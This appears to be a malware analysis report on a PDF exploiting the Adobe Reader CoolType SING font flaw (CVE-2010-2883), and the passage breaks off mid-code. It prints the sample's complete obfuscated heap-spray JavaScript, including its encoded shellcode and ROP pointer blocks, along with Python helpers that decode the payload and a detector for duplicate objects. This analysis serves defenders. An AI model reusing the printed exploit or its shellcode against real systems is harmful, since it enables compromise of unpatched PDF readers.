Malicious PDF — malware analysis report

Static analysis result for SHA-256 cfb9445917b1c0f6…

Verdict: MALICIOUS
File type: PDF
Size: 337.7 KB
First seen: 2026-05-10
MD5: 7058dd4561f5e5b29c766a6426411263
SHA-1: 9d32cd0fdd5e812116aded7684bbbf24b25e943f
SHA-256: cfb9445917b1c0f6b5ca1c4da894176e625e8142d321a93ed9db4de6183e2995
Risk score: 166

Malware Insights

MITRE ATT&CK
  • T1566.001 Phishing: Spearphishing Attachment
  • T1204.002 User Execution: Malicious File
  • T1059.001 Command and Scripting Interpreter: PowerShell (no PowerShell invocation is visible in the extracted script, and the decoded shellcode's API table points to a native file dropper; treat this mapping as unconfirmed by the artifacts below)

The PDF carries embedded JavaScript (the PDF_JAVASCRIPT and PDF_JS heuristics) together with an embedded font that has a SING table, which is the pairing the CVE_2010_2883 rule matches. The extracted script javascript_obj0026_000.js is the delivery stage: it builds the string "%u" at run time from "&%!".charAt(1) + "u", substitutes it for every 'M' in its hex blobs and runs the result through unescape(), so the UTF-16 code units become little-endian shellcode bytes in memory. It then checks app.platform == "WIN" and branches on app.viewerVersion / 10: it alerts "Please update your PDF viewer software." for 5.x and below and for 10.x and above; stores the spray string in a global and jumps to page 11 or 12 for 6.x and 7.x; and for 8.x and 9.x builds a 2000-element spray array whose entries are pad-filled blocks (a 4-byte pad value, itself a 0x4a8xxxxx pointer, repeated 1024 times, fourteen pad blocks plus one that ends in the shellcode), prefixed by a version-specific pointer block, before jumping to page 13 or 14, presumably the page that embeds the font which triggers the CoolType parse. Decoding the first blob shows the Win32 API name table the shellcode resolves from kernel32 by hand: TerminateProcess, LoadLibraryA, SetFilePointer, ReadFile, CreateFileA, WriteFile, CloseHandle, GetTempPathA. That set is a file dropper, not a downloader: no network API appears, so the second stage is most likely read out of the PDF itself through the open file handle and written to the temp directory, a common pattern for exploit PDFs of this era. The version-specific blocks for 8.x and 9.x consist of 0x4a8xxxxx pointers, the shape of a ROP chain into a module that loads at a fixed address (icucnv36.dll at 0x4a800000 in the public CVE-2010-2883 exploits). The ASCIIHexDecode filter, the garbled document body, the XFA form and the AcroForm button are supporting indicators of a document built to exploit the reader rather than a benign form.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9985

Heuristics (9)

  • Adobe Reader CoolType SING font exploit, CVE-2010-2883 [critical] CVE_2010_2883
    PDF embeds a TrueType/OpenType font with an actual SING table and pairs it with JavaScript heap-spray shellcode. This matches the public Adobe Reader CoolType SING exploit shape for CVE-2010-2883, a stack buffer overflow in CoolType.dll's handling of the SING table's uniqueName field.
  • ASCIIHexDecode filter (with exploit indicators) [medium] PDF_FILTER_HEX
    Hex-encoding filter present alongside exploit delivery indicators; often used to hide payload or shellcode bytes.
  • Suspicious extracted artifact [medium] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action [low] PDF_JAVASCRIPT (1 related finding)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream [low] PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • XFA form [low] PDF_XFA
    PDF uses XML Forms Architecture, which can contain script logic.
  • AcroForm button with action trigger [low] PDF_ACROFORM_BUTTON
    PDF contains a /Btn form field together with a SubmitForm/URI/Launch/JS trigger. This is the building block of fake 'Download' or 'Open' button overlays used in PDF phishing lures.
  • Object number defined twice with different bodies [info] PDF_DUPLICATE_OBJ_BODY_INCREMENTAL
    The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    Referenced by PDF JavaScript:
      • http://www.bitstream.com (a font vendor domain; the script preview below does not contain it, so confirm whether it is reachable from the script or only carried in a font name table before treating it as a network indicator)
    In PDF document text (XMP and XFA schema namespace identifiers, not contacted hosts):
      • http://www.w3.org/1999/02/22-rdf-syntax-ns#
      • http://ns.adobe.com/xap/1.0/
      • http://ns.adobe.com/pdf/1.3/
      • http://ns.adobe.com/xap/1.0/mm/
      • http://purl.org/dc/elements/1.1/
      • http://ns.adobe.com/xfa/promoted-desc/
      • http://ns.adobe.com/xdp/
      • http://www.xfa.org/schema/xci/2.6/
      • http://www.xfa.org/schema/xfa-template/2.6/
      • http://www.xfa.org/schema/xfa-locale-set/2.7/
      • http://www.xfa.org/schema/xfa-locale-set/2.6/
      • http://www.xfa.org/schema/xfa-form/2.8/
      • http://www.xfa.org/schema/xfa-data/1.0/
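The duplicate-object shape described under PDF_DUPLICATE_OBJ_BODY_INCREMENTAL, as an added example in Python (not the analysis tool's rule and not code from the sample): it scans raw PDF bytes for every "N G obj ... endobj" definition, groups them by object number and generation, reports those whose bodies differ, shows what a first-wins and a last-wins reader would each resolve, and raises severity only when a body carries active content. The PDF at the bottom is constructed for the demo; its trailer offsets are not valid, it only shows the shape. Function names and the active-content key list are the example's own.

```python
"""Find indirect objects defined more than once with different bodies."""
import re
from collections import defaultdict

# "N G obj <body> endobj", non-greedy so each definition ends at its own endobj.
OBJ_RE = re.compile(rb"(?<![0-9])(\d+)\s+(\d+)\s+obj\b(.*?)endobj", re.S)

# Keys whose presence in a duplicate body makes the finding worth escalating
# (assumed list for this example; extend to taste).
ACTIVE_KEYS = (b"/JS", b"/JavaScript", b"/Launch", b"/OpenAction",
               b"/AA", b"/URI", b"/SubmitForm", b"/XFA")


def object_definitions(pdf: bytes):
    """All definitions in file order: {(num, gen): [(offset, body), ...]}."""
    defs = defaultdict(list)
    for m in OBJ_RE.finditer(pdf):
        key = (int(m.group(1)), int(m.group(2)))
        defs[key].append((m.start(), m.group(3).strip()))
    return defs


def duplicate_bodies(pdf: bytes):
    """Objects whose repeated definitions are not byte-identical.

    first_wins / last_wins are what a reader that keeps the first or the last
    definition would resolve; severity is 'medium' only if any body has
    active content, otherwise 'info' (benign incremental updates do this too).
    """
    findings = []
    for key, bodies in object_definitions(pdf).items():
        if len({b for _, b in bodies}) < 2:
            continue
        active = sorted({k.decode() for _, b in bodies
                         for k in ACTIVE_KEYS if k in b})
        findings.append({
            "obj": "%d %d" % key,
            "definitions": len(bodies),
            "first_wins": bodies[0][1],
            "last_wins": bodies[-1][1],
            "active_content": active,
            "severity": "medium" if active else "info",
        })
    return findings


# Constructed sample: object 4 is first a harmless GoTo action, then redefined
# by an appended incremental update as a JavaScript action.  A first-wins
# parser sees the GoTo; a last-wins parser (and Adobe Reader, which follows
# the newest xref) sees the script.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
4 0 obj << /S /GoTo /D [3 0 R /Fit] >> endobj
trailer << /Root 1 0 R >>
%%EOF
4 0 obj << /S /JavaScript /JS (app.alert(1)) >> endobj
trailer << /Root 1 0 R /Prev 9 >>
%%EOF
"""

if __name__ == "__main__":
    for finding in duplicate_bodies(SAMPLE_PDF):
        print(finding)
```

On a real file, run this against the raw bytes before any decompression and compare its result with what the reader-of-interest actually resolves (the newest xref section), since object streams and cross-reference streams can hide further definitions that a plain regex scan never sees.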

Extracted artifacts (6)

Files carved from inside the sample during analysis.

javascript_obj0026_000.js
  Kind: pdf-javascript-stream
  Source: PDF /JS object 26 at offset 0x47BF
  Size: 9609 bytes
  SHA-256: 1d1885b6c800938e7ec00d369726a3bf52b65eebedcdd60cc006c36da6cab07f
  Detection: ClamAV: No threats found
  Obfuscation or payload: likely. The carved artifact contains 1 eval/decoder/string-building token. 89 of 154 identifiers look randomly generated (e.g. 'M57bcM4a80M156aM4a82MffffMffffM0022M00'), consistent with name-mangling obfuscation; note that the quoted example is a fragment of one of the M-delimited hex blobs rather than an identifier, so the identifier count is slightly inflated by string content.

Preview script (shown in full; the script is shorter than the 1,000-line preview limit)
var Juaidai = 12;
var Tolbqnpp = "";

function Vnyhayduv(Gklcbtj,times){
 Ipugpqlbvtw = ""
 var Otdwcwgpeznj;
 var Juaidai = 723;
 for (Otdwcwgpeznj=0;Otdwcwgpeznj<times;Otdwcwgpeznj++){
 Juaidai = 1;
 Ipugpqlbvtw = Ipugpqlbvtw + Gklcbtj;
 }
 return Ipugpqlbvtw;
}

function Oovachwigu(Jxapyyyksdkd){
 var Juaidai = 12;
 return unescape(Jxapyyyksdkd);
}


var Pimfmtggbh = Tolbqnpp+"&%!".charAt(1)+Tolbqnpp;
Pimfmtggbh = Tolbqnpp + Pimfmtggbh + Tolbqnpp+"u"+Tolbqnpp;
Vbiiclkvlyyl = "";
Vbiiclkvlyyl = Vbiiclkvlyyl +"M52e8M0002M5400M7265M696dM616eM657";
Vbiiclkvlyyl = Vbiiclkvlyyl +"4M7250M636fM7365M0073M6f4cM6461M69";
Vbiiclkvlyyl = Vbiiclkvlyyl +"4cM7262M7261M4179M5300M7465M6946M6";
Vbiiclkvlyyl = Vbiiclkvlyyl +"56cM6f50M6e69M6574M0072M6552M6461M";
Vbiiclkvlyyl = Vbiiclkvlyyl +"6946M656cM4300M6572M7461M4665M6c69";
Vbiiclkvlyyl = Vbiiclkvlyyl +"M4165M5700M6972M6574M6946M656cM430";
Vbiiclkvlyyl = Vbiiclkvlyyl +"0M6f6cM6573M6148M646eM656cM4700M74";
Vbiiclkvlyyl = Vbiiclkvlyyl +"65M6554M706dM6150M6874M0041M516aM5";
Vbiiclkvlyyl = Vbiiclkvlyyl +"336Mc931M8b64M3071M768bM8b0cM1c76M";
Vbiiclkvlyyl = Vbiiclkvlyyl +"468bM8b08M207eM368bM3f81M006bM0065";
Vbiiclkvlyyl = Vbiiclkvlyyl +"Mf075M7f81M7204M6e00M7500Mc3e7Mc38";
Vbiiclkvlyyl = Vbiiclkvlyyl +"9M5b03M8d3cM185bM138bM8166M0bfaM75";
Vbiiclkvlyyl = Vbiiclkvlyyl +"01M8b05M6053M05ebM538bMeb70M0100M8";
Vbiiclkvlyyl = Vbiiclkvlyyl +"bc2M1c5aMc301M4a8bM0120M8bc1M2472M";
Vbiiclkvlyyl = Vbiiclkvlyyl +"c601M31c3M56c0M9d8bM02ebM0000Mbd8b";
Vbiiclkvlyyl = Vbiiclkvlyyl +"M02e7M0000M3c03M5183Ma6f3M5e59M037";
Vbiiclkvlyyl = Vbiiclkvlyyl +"4Meb40M8be6Mf395M0002M3100M66c9M0c";
Vbiiclkvlyyl = Vbiiclkvlyyl +"8bM8b42Mef9dM0002M8b00Me7bdM0002M0";
Vbiiclkvlyyl = Vbiiclkvlyyl +"300M8b3cM8dc3M0075Mc031Mf789Mc931M";
Vbiiclkvlyyl = Vbiiclkvlyyl +"f249M57aeMd9f7M5649Mb2e8MffffM5eff";
Vbiiclkvlyyl = Vbiiclkvlyyl +"M3e89M8d5eM655dMde39Me272M8dc3Mf79";
Vbiiclkvlyyl = Vbiiclkvlyyl +"dM0002M5300Mff53M5855Md801M00c7M6c";
Vbiiclkvlyyl = Vbiiclkvlyyl +"68M2e70M40c7M6304M6c70M3100M89c0M4";
Vbiiclkvlyyl = Vbiiclkvlyyl +"2c2Md189Me1c1M421eM5050M5052M5150M";
Vbiiclkvlyyl = Vbiiclkvlyyl +"9d8dM02f7M0000Mff53M3655M31c3M50c0";
Vbiiclkvlyyl = Vbiiclkvlyyl +"M8d8dM02dfM0000M6a51M8d04Md78dM000";
Vbiiclkvlyyl = Vbiiclkvlyyl +"2M5100M4d8bM5165M55ffM8b2dMdf85M00";
Vbiiclkvlyyl = Vbiiclkvlyyl +"02M8500M74c0M8176MD7BDM0002M6A00M3";
Vbiiclkvlyyl = Vbiiclkvlyyl +"651M7453M906AM9090M9090M9090M9090M";
Vbiiclkvlyyl = Vbiiclkvlyyl +"9090M9090M9090M9090M9090M9090M9090";
Vbiiclkvlyyl = Vbiiclkvlyyl +"M9090M9090M9090M9090M9090M9090M909";
Vbiiclkvlyyl = Vbiiclkvlyyl +"0M9090M9090M9090M9090M9090M9090M90";
Vbiiclkvlyyl = Vbiiclkvlyyl +"90M9090M9090M8190MD7B5M0002MAF00MD";
Vbiiclkvlyyl = Vbiiclkvlyyl +"780M317EM50c0M8d8dM02dfM0000M198bM";
Vbiiclkvlyyl = Vbiiclkvlyyl +"9090M5351M8d8dM02d7M0000M8b51Me38d";
Vbiiclkvlyyl = Vbiiclkvlyyl +"M0002M5100M55ffM8542M0fc0M6685Mfff";
Vbiiclkvlyyl = Vbiiclkvlyyl +"fM8bffMe385M0002M5000M55ffMc34cMd2";
Vbiiclkvlyyl = Vbiiclkvlyyl +"31Mdb31M6a52M5302Mf868MffffM52ffM5";
Vbiiclkvlyyl = Vbiiclkvlyyl +"5ffM5a1eMff3dMffffM737fM5232M8d53M";
Vbiiclkvlyyl = Vbiiclkvlyyl +"df8dM0002M5100M086aM8d8dM02d7M0000";
Vbiiclkvlyyl = Vbiiclkvlyyl +"M5251M55ffM5a2dMf883M7e00M8b16Mdf8";
Vbiiclkvlyyl = Vbiiclkvlyyl +"5M0002M8300M08f8M0b75M858bM02d7M00";
Vbiiclkvlyyl = Vbiiclkvlyyl +"00M453bM7465M4203Mb6ebM6a52M5302M9";
Vbiiclkvlyyl = Vbiiclkvlyyl +"d8bM02dbM0000Mdbf7M5253M55ffM5a1eM";
Vbiiclkvlyyl = Vbiiclkvlyyl +"5dc3M11e8MfffeM89ffMe785M0002Me800";
Vbiiclkvlyyl = Vbiiclkvlyyl +"Mfe2cMffffM8d89M02ebM0000M9d89M02e";
Vbiiclkvlyyl = Vbiiclkvlyyl +"fM0000Mb589M02f3M0000M7ae8MfffeMe8";
Vbiiclkvlyyl = Vbiiclkvlyyl +"ffMff72MffffM5589Me865Mfe8fMffffM8";
Vbiiclkvlyyl = Vbiiclkvlyyl +"589M02e3M0000Mbae8MfffeM8dffMf79dM";
Vbiiclkvlyyl = Vbiiclkvlyyl +"0002M5300M55ffM2911M53dbM5353M0553";
Vbiiclkvlyyl = Vbiiclkvlyyl +"M17a0M0000Md0ffM4d8bM8d00Md7b5M000";
Vbiiclkvlyyl = Vbiiclkvlyyl +"2M8d00M00beM0002M0f00M8831M4606Mfe";
Vbiiclkvlyyl = Vbiiclkvlyyl +"39Mf775Mee89Mbd8dM02c9M0000M310fM0";
Vbiiclkvlyyl = Vbiiclkvlyyl +"688M3946M75feM4bf7M5353Md1ff";

var Enchfcuvtwn = (app.viewerVersion / 10.0);
Vbiiclkvlyyl = Vbiiclkvlyyl.replace(/M/g,Pimfmtggbh);
var Ycjygwhscgnv = this;
Vbiiclkvlyyl = Oovachwigu(Vbiiclkvlyyl);

function Htbcdm(Vbiiclkvlyyl,Bzubmlxlbf,Bkesxwjtsb){
 var Olalun = 1024;
 
 var Saqytin = Vnyhayduv(Bzubmlxlbf,Olalun);
 var Uipcwelcwl = Vnyhayduv(Bzubmlxlbf,Olalun-(Vbiiclkvlyyl.length/2))+Vbiiclkvlyyl;
 
 var FvzlbcjckcfOfFirstEntry = Vnyhayduv(Bzubmlxlbf,Olalun-18);
 var FvzlbcjckcfOfOtherEntry = Vnyhayduv(Bzubmlxlbf,Olalun-11);

 var Vxcuul = [];
 for( Otdwcwgpeznj = 0; Otdwcwgpeznj < 16-2; Otdwcwgpeznj++ ){
 Vxcuul.push( Saqytin );
 }
 Vxcuul.push(Uipcwelcwl);
 var Lvxgmunsmebw = Vxcuul.join("");

 Ycjygwhscgnv.Hpedba = new Array();
 var Wafaue = 0;
 for( Otdwcwgpeznj = 0; Otdwcwgpeznj < Bkesxwjtsb; Otdwcwgpeznj++ ){
 if (Otdwcwgpeznj == 0){
 Ycjygwhscgnv.Hpedba[Otdwcwgpeznj] = FvzlbcjckcfOfFirstEntry+Lvxgmunsmebw;
 } else{
 Ycjygwhscgnv.Hpedba[Otdwcwgpeznj] = FvzlbcjckcfOfOtherEntry+Lvxgmunsmebw;
 }
 }
}


Uzwnncyhd = "M4142M4241";
Uzwnncyhd = Uzwnncyhd.replace(/M/g,Pimfmtggbh);
Uzwnncyhd = Oovachwigu(Uzwnncyhd);


if ( app.platform == "WIN" ){ 
 if ( Enchfcuvtwn <= 0.5999 ) {
 app.alert("Please update your PDF viewer software.");
 } else if ( Enchfcuvtwn <= 0.6999999999 ) {
 global.Mvckuabj = Vnyhayduv(Uzwnncyhd,500)+Vbiiclkvlyyl;
 Ycjygwhscgnv.pageNum = 11;
 } else if ( Enchfcuvtwn <= 0.7999999999 ) {
 global.Mvckuabj = Vnyhayduv(Uzwnncyhd,500)+Vbiiclkvlyyl;
 Ycjygwhscgnv.pageNum = 12; 
 } else if ( Enchfcuvtwn <= 0.8999999999 ) {
 Lfobubh = "";
Lfobubh = Lfobubh +"M17f2M4a82M5000M4a84M630fM4a80M7ec9M4a";
Lfobubh = Lfobubh +"81M203cM4a82M57bcM4a80M156aM4a82M54e0M";
Lfobubh = Lfobubh +"4a82M0000M1000M0000M0000M0000M0000M000";
Lfobubh = Lfobubh +"2M0000M0102M0000M0000M0000M17f2M4a82M1";
Lfobubh = Lfobubh +"56aM4a82Mfe83M4a81Me982M4a81M0008M0000";
Lfobubh = Lfobubh +"M597dM4a80M7ec9M4a81M2038M4a82M57bcM4a";
Lfobubh = Lfobubh +"80M156aM4a82MffffMffffM0000M0000M0040M";
Lfobubh = Lfobubh +"0000M0000M0000M0000M0001M0000M0000M17f";
Lfobubh = Lfobubh +"2M4a82M156aM4a82Mfe83M4a81Me982M4a81M0";
Lfobubh = Lfobubh +"008M0000M597dM4a80M7ec9M4a81M2030M4a82";
Lfobubh = Lfobubh +"M57bcM4a80M156aM4a82MffffMffffM0022M00";
Lfobubh = Lfobubh +"00M0000M0000M0000M0000M0000M0001M17f2M";
Lfobubh = Lfobubh +"4a82M5004M4a84M630fM4a80M17f2M4a82M156";
Lfobubh = Lfobubh +"aM4a82Mfe83M4a81Me982M4a81M0030M0000M5";
Lfobubh = Lfobubh +"97dM4a80M7ec9M4a81M5004M4a84Ma649M4a81";
Lfobubh = Lfobubh +"M17f2M4a82M156aM4a82Mfe83M4a81Me982M4a";
Lfobubh = Lfobubh +"81M0020M0000M597dM4a80M17f2M4a82M156aM";
Lfobubh = Lfobubh +"4a82M00a0M4a82M7ec9M4a81M0034M0000M795";
Lfobubh = Lfobubh +"aM4a80M17f2M4a82M156aM4a82Mfe83M4a81Me";
Lfobubh = Lfobubh +"982M4a81M000aM0000M597dM4a80M7ec9M4a81";
Lfobubh = Lfobubh +"M2140M4a82M57bcM4a80MffffMffffMffffMff";
Lfobubh = Lfobubh +"ffMffffMffffM1000M0000M258bM5000M4a84M";
Lfobubh = Lfobubh +"4d4d";

 Lfobubh = Lfobubh.replace(/M/g,Pimfmtggbh);
 Lfobubh = Oovachwigu(Lfobubh);
 Djcxdzbvuhef = "";
Djcxdzbvuhef = Djcxdzbvuhef +"M12c4M4a80";

 Djcxdzbvuhef = Djcxdzbvuhef.replace(/M/g,Pimfmtggbh);
 Djcxdzbvuhef = Oovachwigu(Djcxdzbvuhef);
 
 Htbcdm(Lfobubh + Vbiiclkvlyyl,Djcxdzbvuhef,2000);
 Ycjygwhscgnv.pageNum = 13;
 } else if ( Enchfcuvtwn <= 0.9999999999 ) {
 Nircgsipef = "";
Nircgsipef = Nircgsipef +"M63a5M4a80M0000M4a8aM2196M4";
Nircgsipef = Nircgsipef +"a80M1f90M4a80M903cM4a84Mb69";
Nircgsipef = Nircgsipef +"2M4a80M1064M4a80M22c8M4a85M";
Nircgsipef = Nircgsipef +"0000M1000M0000M0000M0000M00";
Nircgsipef = Nircgsipef +"00M0002M0000M0102M0000M0000";
Nircgsipef = Nircgsipef +"M0000M63a5M4a80M1064M4a80M2";
Nircgsipef = Nircgsipef +"db2M4a84M2ab1M4a80M0008M000";
Nircgsipef = Nircgsipef +"0Ma8a6M4a80M1f90M4a80M9038M";
Nircgsipef = Nircgsipef +"4a84Mb692M4a80M1064M4a80Mff";
Nircgsipef = Nircgsipef +"ffMffffM0000M0000M0040M0000";
Nircgsipef = Nircgsipef +"M0000M0000M0000M0001M0000M0";
Nircgsipef = Nircgsipef +"000M63a5M4a80M1064M4a80M2db";
Nircgsipef = Nircgsipef +"2M4a84M2ab1M4a80M0008M0000M";
Nircgsipef = Nircgsipef +"a8a6M4a80M1f90M4a80M9030M4a";
Nircgsipef = Nircgsipef +"84Mb692M4a80M1064M4a80Mffff";
Nircgsipef = Nircgsipef +"MffffM0022M0000M0000M0000M0";
Nircgsipef = Nircgsipef +"000M0000M0000M0001M63a5M4a8";
Nircgsipef = Nircgsipef +"0M0004M4a8aM2196M4a80M63a5M";
Nircgsipef = Nircgsipef +"4a80M1064M4a80M2db2M4a84M2a";
Nircgsipef = Nircgsipef +"b1M4a80M0030M0000Ma8a6M4a80";
Nircgsipef = Nircgsipef +"M1f90M4a80M0004M4a8aMa7d8M4";
Nircgsipef = Nircgsipef +"a80M63a5M4a80M1064M4a80M2db";
Nircgsipef = Nircgsipef +"2M4a84M2ab1M4a80M0020M0000M";
Nircgsipef = Nircgsipef +"a8a6M4a80M63a5M4a80M1064M4a";
Nircgsipef = Nircgsipef +"80MaedcM4a80M1f90M4a80M0034";
Nircgsipef = Nircgsipef +"M0000Md585M4a80M63a5M4a80M1";
Nircgsipef = Nircgsipef +"064M4a80M2db2M4a84M2ab1M4a8";
Nircgsipef = Nircgsipef +"0M000aM0000Ma8a6M4a80M1f90M";
Nircgsipef = Nircgsipef +"4a80M9170M4a84Mb692M4a80Mff";
Nircgsipef = Nircgsipef +"ffMffffMffffMffffMffffMffff";
Nircgsipef = Nircgsipef +"M1000M0000M258bM0000M4a8aM4";
Nircgsipef = Nircgsipef +"d4d";

 Nircgsipef = Nircgsipef.replace(/M/g,Pimfmtggbh);
 Nircgsipef = Oovachwigu(Nircgsipef);
 Zxwhjjr = "";
Zxwhjjr = Zxwhjjr +"M1064M4a80";

 Zxwhjjr = Zxwhjjr.replace(/M/g,Pimfmtggbh);
 Zxwhjjr = Oovachwigu(Zxwhjjr);
 
 Htbcdm(Nircgsipef + Vbiiclkvlyyl,Zxwhjjr,2000);
 Ycjygwhscgnv.pageNum = 14;
 } else{
 app.alert("Please update your PDF viewer software.");
 }
}else{
 app.alert("Please update your PDF viewer software.");
}
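The obfuscation the preview uses, reversed in Python as an added example (not code from the sample or from the analysis tool): it rebuilds the "%u" prefix the script derives from "&%!".charAt(1) + "u", applies the M-to-%u substitution and an unescape() emulation to blob fragments copied from the preview above, then pulls the NUL-terminated API name table and the leading call-over-data instruction out of the decoded shellcode, and lists the distinct 0x4a8xxxxx values from the first lines of the Reader 8.x-branch block. Only the first eleven lines of the Vbiiclkvlyyl blob and the first three of Lfobubh are embedded; function names and the pointer range are the example's own, and the range is an assumption taken from the values visible in the blobs.

```python
"""Decode the %u-escape shellcode blobs from javascript_obj0026_000.js."""
import re
import struct

# The script computes "&%!".charAt(1) + "u" at run time; same value here.
PREFIX = "&%!"[1] + "u"

# First eleven lines of the Vbiiclkvlyyl blob, copied from the preview.
SHELLCODE_FRAGMENTS = [
    "M52e8M0002M5400M7265M696dM616eM657",
    "4M7250M636fM7365M0073M6f4cM6461M69",
    "4cM7262M7261M4179M5300M7465M6946M6",
    "56cM6f50M6e69M6574M0072M6552M6461M",
    "6946M656cM4300M6572M7461M4665M6c69",
    "M4165M5700M6972M6574M6946M656cM430",
    "0M6f6cM6573M6148M646eM656cM4700M74",
    "65M6554M706dM6150M6874M0041M516aM5",
    "336Mc931M8b64M3071M768bM8b0cM1c76M",
    "468bM8b08M207eM368bM3f81M006bM0065",
    "Mf075M7f81M7204M6e00M7500Mc3e7Mc38",
]

# First three lines of the Lfobubh blob, the block prepended to the shellcode
# when app.viewerVersion / 10 falls in the 8.x range.
READER8_FRAGMENTS = [
    "M17f2M4a82M5000M4a84M630fM4a80M7ec9M4a",
    "81M203cM4a82M57bcM4a80M156aM4a82M54e0M",
    "4a82M0000M1000M0000M0000M0000M0000M000",
]

_TOKEN = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})|(.)", re.S)


def js_unescape_to_bytes(s: str) -> bytes:
    """Emulate JavaScript unescape() and pack every resulting UTF-16 code
    unit as two little-endian bytes, which is how the spray lays it out."""
    out = bytearray()
    for m in _TOKEN.finditer(s):
        if m.group(1):
            unit = int(m.group(1), 16)
        elif m.group(2):
            unit = int(m.group(2), 16)
        else:                      # malformed escape stays literal, as in JS
            unit = ord(m.group(3))
        out += struct.pack("<H", unit)
    return bytes(out)


def decode_blob(fragments) -> bytes:
    """Apply the script's own steps: join, 'M' -> '%u', unescape."""
    return js_unescape_to_bytes("".join(fragments).replace("M", PREFIX))


def api_strings(shellcode: bytes, min_len: int = 4):
    """NUL-terminated printable runs; here, the Win32 API names the shellcode
    resolves from kernel32 after walking the PEB module list."""
    pattern = rb"([\x20-\x7e]{%d,})\x00" % min_len
    return [m.group(1).decode("ascii") for m in re.finditer(pattern, shellcode)]


def leading_call_rel32(shellcode: bytes):
    """rel32 of a leading CALL (E8): the 'call over the data table' trick
    that leaves the table address on the stack. None if absent."""
    if len(shellcode) < 5 or shellcode[0] != 0xE8:
        return None
    return struct.unpack_from("<i", shellcode, 1)[0]


def module_pointers(blob: bytes, lo: int = 0x4A800000, hi: int = 0x4A900000):
    """Distinct dword values in [lo, hi): a run of these in a version-specific
    block is the shape of a ROP chain into a fixed-address module."""
    seen, ptrs = set(), []
    for off in range(0, len(blob) - 3, 4):
        v = struct.unpack_from("<I", blob, off)[0]
        if lo <= v < hi and v not in seen:
            seen.add(v)
            ptrs.append(v)
    return ptrs


if __name__ == "__main__":
    sc = decode_blob(SHELLCODE_FRAGMENTS)
    print("leading call rel32: %#x" % leading_call_rel32(sc))
    print("API table:", api_strings(sc))
    print("Reader 8.x pointers:",
          [hex(p) for p in module_pointers(decode_blob(READER8_FRAGMENTS))])
```

Feeding all of the Vbiiclkvlyyl lines to decode_blob() yields the complete shellcode for disassembly; the bytes right after the API table (xor ecx,ecx; mov esi,fs:[ecx+0x30]; ...) are the familiar PEB walk looking for kernel32. The pointer values fall inside the load range of a module without ASLR; in the public CVE-2010-2883 exploits that module is icucnv36.dll at 0x4a800000, which should be confirmed against the Reader version being targeted before the addresses are used as gadget lookups.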
font_00_sfnt_off000070c8.bin
  Kind: pdf-font-stream
  Source: PDF embedded font (sfnt) at offset 0x70C8
  Size: 8084 bytes
  SHA-256: e31f8c8507e52f29008d946a00becde9f839e34cb108985ce66167bf881adafa

font_10_sfnt_off000149fa.bin
  Kind: pdf-font-stream
  Source: PDF embedded font (sfnt) at offset 0x149FA
  Size: 65932 bytes
  SHA-256: 422bc5698ba5d9d4818f6a2d8b3abca2f723e713b44a15c390139d2c976a1388

font_11_sfnt_off0001e85c.bin
  Kind: pdf-font-stream
  Source: PDF embedded font (sfnt) at offset 0x1E85C
  Size: 65932 bytes
  SHA-256: 7e24ee16c8b09ee74d61445f29c3c0a95abfdf17fc1008606394f159dbd0c106
  Detection: ClamAV: No threats found
  Obfuscation or payload: likely. Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)

font_12_sfnt_off000286ba.bin
  Kind: pdf-font-stream
  Source: PDF embedded font (sfnt) at offset 0x286BA
  Size: 65932 bytes
  SHA-256: 57e24925bc6bdb98d38e8b4ba3b87f80f75c5e49ea9a522486790d7dc6848549
  Detection: ClamAV: No threats found
  Obfuscation or payload: likely. Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)

font_13_sfnt_off000324e1.bin
  Kind: pdf-font-stream
  Source: PDF embedded font (sfnt) at offset 0x324E1
  Size: 65932 bytes
  SHA-256: 1f068d668b316fcb46f0801be00137fb749cc7fda5ca15e442829d6c303d8f99
  Detection: ClamAV: No threats found
  Obfuscation or payload: likely. Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)

Four of the five font streams are exactly 65932 bytes with distinct hashes, and three of them carry long 0x41 runs that the static shellcode pass reports as spray filler. In a CVE-2010-2883 sample the overlong uniqueName field of the SING table is the usual home for such filler, so the check worth making on these streams is to parse the sfnt table directory, locate the SING table and see whether its 28-byte uniqueName is NUL-terminated.
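That check, written out as an added example in Python (not the tool's CVE_2010_2883 rule and not code from the sample): it parses the sfnt offset table and table directory, bounds-checks each record against the file, and flags a SING table whose uniqueName has no terminator within its 28 bytes, the field that CoolType.dll copied without a length check. The two fonts at the bottom are constructed for the demo, not the carved streams; the suspicious one uses 0x41 filler to mirror the indicator reported above. Field offsets follow the SING table layout (eight uint16 header fields, then the 28-byte uniqueName); the function names are the example's own.

```python
"""Flag sfnt fonts whose SING table uniqueName is not NUL-terminated."""
import struct

SING_UNIQUENAME_OFF = 16   # after the eight uint16 header fields
SING_UNIQUENAME_LEN = 28
SFNT_VERSIONS = (0x00010000, 0x4F54544F, 0x74727565)   # 1.0, 'OTTO', 'true'


def sfnt_tables(font: bytes) -> dict:
    """Parse the offset table and return {tag: (offset, length)}, rejecting
    directories that point outside the file."""
    if len(font) < 12:
        raise ValueError("too short for an sfnt header")
    version, num_tables = struct.unpack_from(">IH", font, 0)
    if version not in SFNT_VERSIONS:
        raise ValueError("not an sfnt: version %#x" % version)
    tables = {}
    for i in range(num_tables):
        rec = 12 + 16 * i
        if rec + 16 > len(font):
            raise ValueError("table directory truncated")
        tag, _checksum, off, length = struct.unpack_from(">4sIII", font, rec)
        if off + length > len(font):
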